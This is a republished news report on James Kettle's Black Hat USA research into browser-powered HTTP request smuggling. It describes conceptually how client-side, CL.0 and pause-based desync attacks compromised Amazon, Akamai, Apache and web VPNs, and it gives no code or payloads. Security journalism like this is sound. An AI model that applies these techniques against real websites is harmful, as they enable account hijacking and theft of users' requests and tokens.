Connect with us
ANE Scholarship
Categories:

Technology

Browser-powered desync: Black Hat USA presents a new class of HTTP request smuggling attacks

Published

on

Browser-powered desync: Black Hat USA presents a new class of HTTP request smuggling attacks
Share this post:

Renowned researcher James Kettle demonstrates his latest attack technique in Las Vegas.

A new class of HTTP request smuggling attack allowed a security researcher to compromise multiple popular websites including Amazon and Akamai, break TLS, and exploit Apache servers.

Speaking at Black Hat USA yesterday (August 10), James Kettle unveiled research that opens the new frontier in HTTP request smuggling – browser-powered desync attacks.

The briefing and it’s whitepaper, titled ‘Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling’, builds on Kettle’s previous research into desync attacks.

 

Traditional desync attacks poison the connection between a front-end and back-end server and are therefore impossible on websites that don’t use a front-end/back-end architecture.

However this new technique causes a desync between the front-end and the browser, allowing an attacker to “craft high-severity exploits without relying on malformed requests that browsers will never send”, Kettle noted.

This can expose a whole new range of websites to server-side request smuggling and enables an attacker to perform client-side variations of these attacks by inducing a victim’s browser to poison its own connection to a vulnerable web server.

Kettle demonstrated how he was able to turn a victim’s web browser into a desync delivery platform, shifting the request smuggling frontier by exposing single-server websites and internal networks.

He was able to combine cross-domain requests with server flaws to poison browser connection pools, install backdoors, and release desync worms – in turn compromising targets including Amazon, Apache, Akamai, Varnish, and multiple web VPNs.

Discovery

Kettle told attendees at the 25th anniversary of the annual hacking conference that four separate vulnerabilities led to the discovery of browser-powered desync attacks.

The first, involving request validation, leverages a technique in which an attacker can use two requests down the same connection with a valid host header in order to gain access to the host in the second request, because the reverse proxy only validates the first host.

The second, first-request routing, is a closely related flaw which occurs when the front-end uses the first request’s Host header to decide which back-end to route the request to, and then routes all subsequent requests from the same client connection down the same back-end connection.

Kettle also discovered a technique to detect connection-locked request smuggling by using a delay and reading the data early to decide if the front-end is using the Content-Length header.

If it is using the Content-Length it will time out, which will signify the difference between connection-locked HTTP/1 request smuggling and harmless HTTP pipelining.

A fourth vulnerability caused a desync known as CL.0/H2.0. Kettle was able to use this to compromise Amazon users’ accounts, enabling him to steal users’ requests and add them to his shopping list. He could capture all their requests, including tokens which could have enabled him to impersonate those users.

Speaking to Daily Swig, Kettle said: “I was really surprised that it was possible to cause a CL.0 desync and also a client-side desync using a legitimate, valid HTTP request.

“It’s understandable when servers get confused by requests that use header obfuscation to hit edge-cases, but getting desync’d by a completely valid, RFC-compliant HTTP request is something else.”

‘Much cooler’ exploit

Kettle reported this issue to Amazon, which fixed it, but he soon realized that he had “made a terrible mistake and missed out on a much cooler potential exploit”.

“The attack request was so vanilla that I could have made anyone’s web browser issue it using fetch(),” Kettle noted in a whitepaper.

“By using the HEAD technique on Amazon to create an XSS gadget and execute JavaScript in victim’s browsers, I could have made each infected victim re-launch the attack themselves, spreading it to numerous others.

“This would have released a desync worm – a self-replicating attack which exploits victims to infect others with no user-interaction, rapidly exploiting every active user on Amazon.

“I wouldn’t advise attempting this on a production system, but it could be fun to try on a staging environment. Ultimately this browser-powered desync was a cool finding, a missed opportunity, and also a hint at a new attack class.”

 

Most server-side desyncs can only be triggered by a custom HTTP client issuing a malformed request, but as Kettle proved with Amazon, it is sometimes possible to create a browser-powered server-side desync.

This enables exploitation of single-server websites, which Kettle noted “is valuable because they’re often spectacularly poor at HTTP parsing”.

“A client-side desync attack starts with the victim visiting the attacker’s website, which then makes their browser send two cross- domain requests to the vulnerable website,” Kettle explained.

“The first request is crafted to desync the browser’s connection and make the second request trigger a harmful response, typically giving the attacker control of the victim’s account.”

 

Kettle also demonstrated how he was able to carry out a pause-based desync attack, which occurs if a server doesn’t close a connection when timing out. If an attacker issues half of the request and pauses, the server times out and leaves the socket open. They can then issue the second half of the request that is issued as a new request.

Kettle also demonstrated how he was able to perform a client-side pause-based desync attack, where he broke TLS performing a manipulator-in-the-middle (MiTM) attack but instead of trying to decrypt the traffic, caused a delay when a specific packet size is encountered which can cause a client-side pause desync attack, which he successfully carried out on Apache.

He also automated detection of these client-side and identified a range of real vulnerable websites, including Akamai, Cisco’s web VPN, and Pulse Secure VPN.

Kettle told Daily Swig that he plans to do a few followup research drops continuing the request smuggling theme over the next couple of months, but that his next major research project “will target something entirely different”.


Get More Stories Like This On: Facebook: @AllNaijaEntertainment, Twitter: @AllNaijaEntertainment

Click to comment

Leave a Reply

Your email address will not be published.

Twitter
News3 hours ago

Elon Musk proposes to buy Twitter

News3 hours ago

My administration spends N8b yearly on exam fees, school feeding – Tambuwal

Woman describes how her 4-year-old daughter died after being sexually assaulted
News4 hours ago

Woman describes how her 4-year-old daughter died after being sexually assaulted

House of Reps to investigate the root causes of incessant national grid collapse
News4 hours ago

House of Reps to investigate the root causes of incessant national grid collapse

Mikel John Obi describes the choice to move to Chelsea instead of Manchester United
Sports5 hours ago

Mikel John Obi describes the choice to move to Chelsea instead of Manchester United

Mario Melchiot warns Premier League is becoming a one-team league
Sports5 hours ago

Mario Melchiot warns Premier League is becoming a one-team league

Kalidou Koulibaly insists Chelsea will be ready for Olivier Giroud
Sports6 hours ago

Kalidou Koulibaly insists Chelsea will be ready for Olivier Giroud

Chelsea leading battle to sign Rafael Leao as AC Milan set price tag for star
Sports6 hours ago

Chelsea leading battle to sign Rafael Leao as AC Milan set price tag for star

Asa sues Joeboy for N300 million in copyright violation
Entertainment6 hours ago

Asa sues Joeboy for N300 million in copyright violation

Soso Soberekon tried to kill me – Harrysong
Entertainment7 hours ago

Soso Soberekon tried to kill me – Harrysong

Epic movie "Anikulapo" by Kunle Afolayan is scheduled to premiere in September
Entertainment19 hours ago

World tagged ‘Anikulapo’ a masterpiece – Kunle Afolayan response to Oscars snub

Wakanda Forever: Marvel reveals identity of Black Panther in official trailer
Entertainment19 hours ago

Wakanda Forever: Marvel reveals identity of Black Panther in official trailer

Horoscope19 hours ago

Your daily horoscope for Tuesday, October 4, 2022

Rancher stored confidential information in plaintext, exposed Kubernetes clusters to takeover
Technology1 day ago

Rancher stored confidential information in plaintext, exposed Kubernetes clusters to takeover

Web security weakness in Sophos Firewall patched
Technology1 day ago

Web security weakness in Sophos Firewall patched

Kim Kardashian penalized $1.26m for cryptocurrency ad
Entertainment1 day ago

Kim Kardashian penalized $1.26m for cryptocurrency ad

News1 day ago

NDLEA: 121 suspects arrested, seals 13 properties in Kaduna

ASUU Strike: We are all affected — Edo Rep
News1 day ago

ASUU Strike: We are all affected — Edo Rep

News1 day ago

NDLEA discovers Tramadol pills worth 13 million in a Lekki mansion

APC
News1 day ago

2023 Election: Zamfara electorate ready to vote APC – Chairman

Gov. David Umahi defends Tinubu
News1 day ago

Gov. David Umahi defends Tinubu

President Buhari set to present national awards to Burna Boy, 2Baba, and Teni
Entertainment2 days ago

President Buhari set to present national awards to Burna Boy, 2Baba, and Teni

Buju BNXN: 'I'm heartbroken' – after his nude video was leaked
Entertainment2 days ago

Buju (BNXN) drops snippet for unreleased song

Diddy and Niniola set to collaborate for new single
Entertainment2 days ago

Diddy and Niniola set to collaborate for new single

Aaron Ramsdale likens William Saliba to ‘Rolls-Royce’ but says he still needs ‘digging out’
Sports2 days ago

Aaron Ramsdale likens William Saliba to ‘Rolls-Royce’ but says he still needs ‘digging out’

Christopher Nkunku enters into a pre-contract agreement with Chelsea for 2023 transfer
Sports2 days ago

Christopher Nkunku enters into a pre-contract agreement with Chelsea for 2023 transfer

Raphael Varane to undergo scan on ankle injury
Sports2 days ago

Raphael Varane to undergo scan on ankle injury

Sports2 days ago

Granit Xhaka apologized to Arsenal teammates at half-time during Tottenham win

Horoscope2 days ago

Your daily horoscope for Monday, October 3, 2022

Phil Foden
Sports2 days ago

Phil Foden Breaks Messi’s Record

Phyna BBNaija
Entertainment2 days ago

Phyna Wins BBNaija Season 7

Reno Omokri
News2 days ago

2023: Peter Obi Not Qualified – Omokri

Osasuna End Real Madrid’s Perfect Start To Season, Barcelona Climbs
Sports2 days ago

Osasuna End Real Madrid’s Perfect Start To Season, Barcelona Climbs

ASSU
Education2 days ago

Nigeria Govt Sends Warning To ASUU

Manchester United is getting ready for a transfer war for Benfica's star striker
Sports2 days ago

Manchester United is getting ready for a transfer war for Benfica’s star striker

Your weekly tarot horoscope for July 24 to July 30 – and Jupiter going retrograde
Horoscope2 days ago

Your weekly tarot horoscope for October 2 to October 8 and the end of Mercury retrograde

News3 days ago

Suffering and despair among Nigerians may not end soon – Gov. Wike

Group kicks as FG prepares to end amnesty scheme
News3 days ago

Group kicks as FG prepares to end amnesty scheme

Ohuabunwa warns Buhari about the potential collapse of the country
News3 days ago

Ohuabunwa warns Buhari about the potential collapse of the country

Keyamo, Omokri react to Obidients’ rallies
News3 days ago

Keyamo, Omokri react to Obidients’ rallies

Sports7 days ago

Xavi: 18-year-old Roman Vega Joins Barcelona’s First-team Training

Graham Potter praises Pierre-Emerick Aubameyang as Crystal Palace chairman criticizes Jorginho.Graham Potter praises Pierre-Emerick Aubameyang as Crystal Palace chairman criticizes Jorginho
Sports3 days ago

Graham Potter praises Pierre-Emerick Aubameyang as Crystal Palace chairman criticizes Jorginho

Mikael Silvestre explains why Arsenal could be in trouble for north London derby
Sports5 days ago

Thomas Partey: Player Arsenal can’t afford to be without against Tottenham – Alan Smith

Graham Potter created a ‘problem’ with Raheem Sterling at Chelsea – William Gallas
Sports6 days ago

Graham Potter created a ‘problem’ with Raheem Sterling at Chelsea – William Gallas

Your weekly tarot horoscope for July 24 to July 30 – and Jupiter going retrograde
Horoscope2 days ago

Your weekly tarot horoscope for October 2 to October 8 and the end of Mercury retrograde

Chelsea made a mistake over Conor Gallagher – Glen Johnson
Sports6 days ago

Chelsea made a mistake over Conor Gallagher – Glen Johnson

Mikael Silvestre explains why Arsenal could be in trouble for north London derby
Sports6 days ago

Mikael Silvestre explains why Arsenal could be in trouble for north London derby

Russia expecting answer from Apple for blocking its largest social media app
Technology6 days ago

Russia expecting answer from Apple for blocking its largest social media app

Twitter pulled out of "OnlyFans-style service" over child safety fears
Technology5 days ago

Twitter under fire for placing ads next to child abuse content

Multiple cyberattacks launched by Anonymous against the Iranian government
Technology5 days ago

Multiple cyberattacks launched by Anonymous against the Iranian government

Wilfried Zaha criticizes Reece James in deleted social media post after Chelsea win
Sports3 days ago

Wilfried Zaha criticizes Reece James in deleted social media post after Chelsea win

Lagos monarch jailed 15 years for faking kidnap
News6 days ago

Lagos monarch jailed 15 years for faking kidnap

Jack Wilshere sends message to Arsenal record breaker "Ethan Nwaneri"
Sports5 days ago

Jack Wilshere sends message to Arsenal record breaker “Ethan Nwaneri”

Your daily horoscope for Monday, July 25, 2022
Horoscope6 days ago

Your daily horoscope for Wednesday, September 28, 2022

BBNaija S7: Sheggz reacts to being abusive with Bella
Entertainment5 days ago

BBNaija S7: Sheggz reacts to being abusive with Bella

Sheggz' ex tweets accusing Sheggz of abuse
Entertainment3 days ago

Sheggz’ ex tweets accusing Sheggz of abuse

Mark Hamill joins forces with President Zelensky, compare Russia to ‘the evil empire’
News4 days ago

Mark Hamill joins forces with President Zelensky, compare Russia to ‘the evil empire’

Graham Potter explains Chelsea new move to Brighton supporters
Sports4 days ago

Graham Potter confirms four Chelsea stars will miss Crystal Palace

Brendan Rodgers would be ‘logical’ appointment at Chelsea and reveals Graham Potter worry – Rio Ferdinand
Sports3 days ago

Rio Ferdinand discusses what impressed him most about William Saliba in win over Tottenham

Asake sells out second London O2 show in minutes, release date for third show
Entertainment4 days ago

Asake sells out second London O2 show in minutes, release date for third show

News5 days ago

NECO releases SSCE internal results for 2022

Manchester United is getting ready for a transfer war for Benfica's star striker
Sports2 days ago

Manchester United is getting ready for a transfer war for Benfica’s star striker

Nord Stream blasts ‘clearly an act of sabotage’ – Liz Truss
News3 days ago

Nord Stream blasts ‘clearly an act of sabotage’ – Liz Truss

US Embassy warns Americans should leave Russia
News6 days ago

US Embassy warns Americans should leave Russia

Barcelona eyeing a move for Man City star Ilkay Gundogan
Sports5 days ago

Barcelona eyeing a move for Man City star Ilkay Gundogan

An elite fitness watch and Apple’s best for years [Apple Watch Ultra review]
Technology3 days ago

An elite fitness watch and Apple’s best for years [Apple Watch Ultra review]

Sen. Bamidele receives a national honor from Buhari
News5 days ago

Sen. Bamidele receives a national honor from Buhari

APC dismisses alleged conflict between Adamu, Tinubu
News5 days ago

APC dismisses alleged conflict between Adamu, Tinubu

Zelensky wants to expedite Ukraine’s bid to join Nato after Putin’s land grab
News4 days ago

Zelensky wants to expedite Ukraine’s bid to join Nato after Putin’s land grab

Hocus Pocus 2 casts spell on fans as first reactions heap praise on sequel
Entertainment3 days ago

Hocus Pocus 2 casts spell on fans as first reactions heap praise on sequel

Sports2 days ago

Granit Xhaka apologized to Arsenal teammates at half-time during Tottenham win

Ihedioha disputes claims that Obi supporters are saboteurs
News4 days ago

Ihedioha disputes claims that Obi supporters are saboteurs

Tiwa Savage performs her brand-new single with Major Lazer at Paris Fashion Week
Entertainment6 days ago

Tiwa Savage performs her brand-new single with Major Lazer at Paris Fashion Week

Rancher stored confidential information in plaintext, exposed Kubernetes clusters to takeover
Technology1 day ago

Rancher stored confidential information in plaintext, exposed Kubernetes clusters to takeover

Buju BNXN: 'I'm heartbroken' – after his nude video was leaked
Entertainment2 days ago

Buju (BNXN) drops snippet for unreleased song

Phyna BBNaija
Entertainment3 days ago

BBNaija S7: Groovy was forming all busy, Amaka didn’t blow me a kiss – Phyna laments

Asake sells out O2 London show, announces second show
Entertainment4 days ago

Asake sells out O2 London show, announces second show

Your daily horoscope for Monday, July 25, 2022
Horoscope5 days ago

Your daily horoscope for Thursday, September 29, 2022

AttachMe Oracle cloud bug exposes volumes to data theft and hijacking
Technology3 days ago

AttachMe Oracle cloud bug exposes volumes to data theft and hijacking

Court dissolves 10-year-old marriage
News3 days ago

Court dissolves 10-year-old marriage

ANE Billboard Hots